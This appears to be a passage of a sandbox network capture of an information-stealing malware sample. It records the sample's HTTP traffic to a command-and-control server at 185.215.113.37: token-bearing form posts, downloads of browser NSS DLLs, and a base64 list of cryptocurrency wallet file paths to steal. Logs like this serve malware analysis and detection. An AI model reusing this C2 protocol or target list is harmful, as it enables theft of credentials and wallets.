0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 30, 2024 07:08:02.638710976 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBF Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 30, 2024 07:08:03.500562906 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:03.575006962 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 30, 2024 07:08:04.425265074 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:04.452943087 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGC Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file"------FIIJJKKFHIEHJKECGCGC--
Sep 30, 2024 07:08:05.190960884 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:05.521486998 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="file"------JJJEBGDAFHJEBGDGIJDH--
Sep 30, 2024 07:08:06.245879889 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:06.442893982 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:06.664453983 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 30, 2024 07:08:07.572974920 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:07.794265032 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:07 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 30, 2024 07:08:08.177794933 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:08.400124073 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:08 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 30, 2024 07:08:08.765681028 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:08.987327099 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:08 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 30, 2024 07:08:10.379322052 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:10.600820065 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 30, 2024 07:08:11.203263998 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:11.425052881 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 30, 2024 07:08:12.260118961 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 30, 2024 07:08:12.981959105 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:13.159435034 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJK Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="message"wallets------BGCBGCAFIIECBFIDHIJK--
Sep 30, 2024 07:08:13.383322001 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:13 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 30, 2024 07:08:13.473746061 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHD Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 44 2d 2d 0d 0a Data Ascii: ------BGHCGCAEBFIJKFIDBGHDContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------BGHCGCAEBFIJKFIDBGHDContent-Disposition: form-data; name="message"files------BGHCGCAEBFIJKFIDBGHD--
Sep 30, 2024 07:08:13.697544098 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:13.726557970 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 